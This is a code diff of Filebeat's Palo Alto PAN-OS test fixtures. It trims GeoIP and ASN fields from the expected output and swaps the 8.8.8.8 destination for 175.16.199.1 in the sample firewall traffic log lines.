@@ -7428,17 +6866,7 @@ "client.nat.port": 25557, "client.port": 53167, "destination.address": "54.209.101.70", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "54.209.101.70", "destination.nat.ip": "54.209.101.70", "destination.nat.port": 443, @@ -7536,17 +6964,7 @@ "client.nat.port": 20661, "client.port": 53150, "destination.address": "54.209.101.70", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "54.209.101.70", "destination.nat.ip": "54.209.101.70", "destination.nat.port": 443, 
@@ -7644,17 +7062,7 @@ "client.nat.port": 65438, "client.port": 53185, "destination.address": "54.209.101.70", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "54.209.101.70", "destination.nat.ip": "54.209.101.70", "destination.nat.port": 443, @@ -7752,17 +7160,7 @@ "client.nat.port": 53101, "client.port": 53187, "destination.address": "54.209.101.70", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "54.209.101.70", "destination.nat.ip": "54.209.101.70", "destination.nat.port": 443, 
@@ -7860,17 +7258,7 @@ "client.nat.port": 35463, "client.port": 53188, "destination.address": "54.209.101.70", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "54.209.101.70", "destination.nat.ip": "54.209.101.70", "destination.nat.port": 443, @@ -7968,17 +7356,7 @@ "client.nat.port": 45769, "client.port": 53178, "destination.address": "54.209.101.70", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "54.209.101.70", "destination.nat.ip": "54.209.101.70", "destination.nat.port": 443, diff --git a/x-pack/filebeat/module/panw/panos/test/traffic.log b/x-pack/filebeat/module/panw/panos/test/traffic.log index c3e74310f06b..6d84c3bc5707 100644 --- a/x-pack/filebeat/module/panw/panos/test/traffic.log +++ b/x-pack/filebeat/module/panw/panos/test/traffic.log 
@@ -1,87 +1,87 @@
 Nov 30 16:09:08 PA-220 1,2018/11/30 16:09:07,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:07,192.168.15.207,184.51.253.152,192.168.1.63,184.51.253.152,new_outbound_from_trust,,,apple-maps,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:07,22751,1,55113,443,16418,443,0x400053,tcp,allow,7734,1758,5976,36,2018/11/30 15:59:04,586,computer-and-internet-info,0,32091112,0x0,192.168.0.0-192.168.255.255,United States,0,16,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.207,17.253.3.202,192.168.1.63,17.253.3.202,new_outbound_from_trust,,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24138,1,55114,80,51990,80,0x40001c,tcp,allow,1574,539,1035,11,2018/11/30 16:08:51,1,computer-and-internet-info,0,32091114,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:16 PA-220 1,2018/11/30 
16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.196,216.58.194.99,192.168.1.63,216.58.194.99,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23003,1,46774,443,15252,443,0x400019,udp,allow,3627,2014,1613,8,2018/11/30 16:07:13,0,any,0,32091116,0x0,192.168.0.0-192.168.255.255,United States,0,5,3,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,209.234.224.22,192.168.1.63,209.234.224.22,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23919,1,52408,443,40763,443,0x400053,tcp,allow,41753,20642,21111,113,2018/11/30 16:07:33,85,web-advertisements,0,32091117,0x0,192.168.0.0-192.168.255.255,United States,0,62,51,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:21,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,172.217.2.238,192.168.1.63,172.217.2.238,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,23698,1,59190,443,52881,443,0x400019,udp,allow,7097,3365,3732,16,2018/11/30 16:07:04,15,any,0,32091119,0x0,192.168.0.0-192.168.255.255,United States,0,7,9,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:23 PA-220 1,2018/11/30 16:09:22,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:22,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:24 PA-220 1,2018/11/30 16:09:23,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:23,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:23 PA-220 1,2018/11/30 16:09:22,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:22,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:24 PA-220 1,2018/11/30 16:09:23,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:23,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,17.249.60.78,192.168.1.63,17.249.60.78,new_outbound_from_trust,,,apple-push-notifications,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,22662,1,55112,443,42021,443,0x400053,tcp,allow,9978,4509,5469,32,2018/11/30 15:58:59,593,computer-and-internet-info,0,32091122,0x0,192.168.0.0-192.168.255.255,United States,0,16,16,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 
16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:28 PA-220 1,2018/11/30 
16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,98.138.49.44,192.168.1.63,98.138.49.44,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24212,1,52442,443,14660,443,0x40001c,tcp,allow,9891,2086,7805,27,2018/11/30 16:08:54,17,web-advertisements,0,32091129,0x0,192.168.0.0-192.168.255.255,United States,0,14,13,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:28,192.168.15.224,72.30.3.43,192.168.1.63,72.30.3.43,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24149,1,52441,443,16483,443,0x40001c,tcp,allow,8460,2354,6106,24,2018/11/30 16:08:54,17,web-advertisements,0,32091130,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.224,172.217.9.142,192.168.1.63,172.217.9.142,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,23856,1,52355,80,5570,80,0x40001c,tcp,allow,5790,2545,3245,36,2018/11/30 16:07:16,116,computer-and-internet-info,0,32091132,0x0,192.168.0.0-192.168.255.255,United States,0,19,17,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:29,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:31 PA-220 1,2018/11/30 16:09:30,012801096514,TRAFFIC,start,2049,2018/11/30 16:09:30,192.168.15.224,54.84.80.198,192.168.1.63,54.84.80.198,new_outbound_from_trust,,,traps-management-service,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:30,24257,1,52454,443,12122,443,0x400053,tcp,allow,6295,1758,4537,25,2018/11/30 16:09:13,0,computer-and-internet-info,0,32091134,0x0,192.168.0.0-192.168.255.255,United States,0,13,12,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:33 PA-220 1,2018/11/30 16:09:32,012801096514,TRAFFIC,drop,2049,2018/11/30 16:09:32,192.168.15.224,199.167.55.52,192.168.1.63,199.167.55.52,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:32,24090,1,52445,4282,49145,4282,0x400019,tcp,allow,624,624,0,8,2018/11/30 16:09:12,13,any,0,32091135,0x0,192.168.0.0-192.168.255.255,United States,0,8,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:34 PA-220 1,2018/11/30 16:09:33,012801096514,TRAFFIC,deny,2049,2018/11/30 
16:09:33,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:35 PA-220 1,2018/11/30 16:09:34,012801096514,TRAFFIC,,2049,2018/11/30 16:09:34,192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:34 PA-220 1,2018/11/30 16:09:33,012801096514,TRAFFIC,deny,2049,2018/11/30 16:09:33,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:35 PA-220 1,2018/11/30 16:09:34,012801096514,TRAFFIC,,2049,2018/11/30 16:09:34,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:38 PA-220 1,2018/11/30 16:09:37,012801096514,TRAFFIC,test,2049,2018/11/30 16:09:37,192.168.15.224,172.217.9.142,192.168.1.63,172.217.9.142,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:09:37,23892,1,62730,443,9299,443,0x400019,udp,allow,4867,2876,1991,12,2018/11/30 16:07:20,15,any,0,32091138,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,151.101.2.2,192.168.1.63,151.101.2.2,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,24360,1,52506,443,47194,443,0x40001c,tcp,allow,1623,1100,523,13,2018/11/30 16:09:21,0,business-and-economy,0,32091139,0x0,192.168.0.0-192.168.255.255,United States,0,8,5,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,216.58.194.66,192.168.1.63,216.58.194.66,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,23952,1,60596,443,62921,443,0x400019,udp,allow,4405,1977,2428,9,2018/11/30 16:07:36,0,any,0,32091140,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
